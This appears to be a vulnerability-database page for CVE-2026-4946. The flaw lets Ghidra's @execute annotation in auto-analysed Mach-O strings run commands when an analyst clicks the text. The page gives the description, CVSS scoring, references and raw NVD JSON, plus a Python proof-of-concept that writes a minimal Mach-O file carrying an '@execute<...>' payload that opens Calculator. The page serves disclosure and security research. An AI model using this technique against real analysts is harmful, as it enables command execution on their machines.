CVE-2026-4946

Description

Ghidra versions prior to 12.0.3 improperly process annotation directives embedded in automatically extracted binary data, resulting in arbitrary command execution when an analyst interacts with the UI. Specifically, the @execute annotation (which is intended for trusted, user-authored comments) is also parsed in comments generated during auto-analysis (such as CFStrings in Mach-O binaries). This allows a crafted binary to present seemingly benign clickable text which, when clicked, executes attacker-controlled commands on the analyst’s machine.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ghidra < 12.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-4946
# This script generates a malicious Mach-O binary structure concept.
# The payload uses the '@execute' directive within a CFString.

import struct

def create_malicious_macho(filename):
    """
    Creates a dummy Mach-O file containing a malicious CFString.
    When analyzed in Ghidra < 12.0.3, clicking the string triggers the command.
    """
    # The malicious command to execute (e.g., open calculator on macOS)
    command = b"open /Applications/Calculator.app"
    
    # The Ghidra script directive to execute the command
    # This string is placed where Ghidra expects a C String (CFString)
    payload = f"@execute<{command.decode()}>".encode('utf-8')
    
    with open(filename, 'wb') as f:
        # Mach-O Header (Magic number for 32-bit: 0xFEEDFACE)
        # This is a minimal header to simulate a binary structure
        f.write(struct.pack('<I', 0xFEEDFACE)) 
        f.write(struct.pack('<I', 0x00000012)) # cputype (x86)
        f.write(struct.pack('<I', 0x00000001)) # cpusubtype
        f.write(struct.pack('<I', 0x00000000)) # filetype
        f.write(struct.pack('<I', 0x00000054)) # ncmds (dummy offset)
        f.write(struct.pack('<I', 0x00000000)) # sizeofcmds
        f.write(struct.pack('<I', 0x00000085)) # flags
        
        # In a real exploit, we would construct a proper __cstring section.
        # Here we just append the payload to simulate the data extraction.
        f.write(b"\x00" * 100) # Padding
        f.write(payload)
        
    print(f"[+] Generated malicious binary: {filename}")
    print(f"[+] Payload embedded: {payload.decode()}")

if __name__ == "__main__":
    create_malicious_macho("ghidra_exploit_poc")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4946
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4946
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4946/
[4] VulDB https://vuldb.com/cve/CVE-2026-4946
[5] https://github.com/NationalSecurityAgency/ghidra/security/advisories/GHSA-mc3p-mq2p-xw6v
[6] https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001011111111111000111111110000000000000000000000000000000000000000000000000000000110
[7] https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001011111111111000111111110000000000000000000000000000000000000000000000000000000110

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4946", "sourceIdentifier": "[email protected]", "published": "2026-03-29T20:16:12.723", "lastModified": "2026-03-30T15:16:33.710", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ghidra versions prior to 12.0.3 improperly process annotation directives embedded in automatically extracted binary data, resulting in arbitrary command execution when an analyst interacts with the UI. Specifically, the @execute annotation (which is intended for trusted, user-authored comments) is also parsed in comments generated during auto-analysis (such as CFStrings in Mach-O binaries). This allows a crafted binary to present seemingly benign clickable text which, when clicked, executes attacker-controlled commands on the analyst’s machine."}, {"lang": "es", "value": "Las versiones de Ghidra anteriores a la 12.0.3 procesan incorrectamente las directivas de anotación incrustadas en datos binarios extraídos automáticamente, lo que resulta en la ejecución arbitraria de comandos cuando un analista interactúa con la interfaz de usuario. Específicamente, la anotación @execute (que está destinada a comentarios de confianza, creados por el usuario) también se analiza en comentarios generados durante el autoanálisis (como CFStrings en binarios Mach-O). Esto permite que un binario manipulado presente texto en el que se puede hacer clic, aparentemente benigno, que, al hacer clic, ejecuta comandos controlados por el atacante en la máquina del analista."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/NationalSecurityAgency/ghidra/security/advisories/GHSA-mc3p-mq2p-xw6v", "source": "[email protected]"}, {"url": "https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001011111111111000111111110000000000000000000000000000000000000000000000000000000110", "source": "[email protected]"}, {"url": "https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001011111111111000111111110000000000000000000000000000000000000000000000000000000110", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}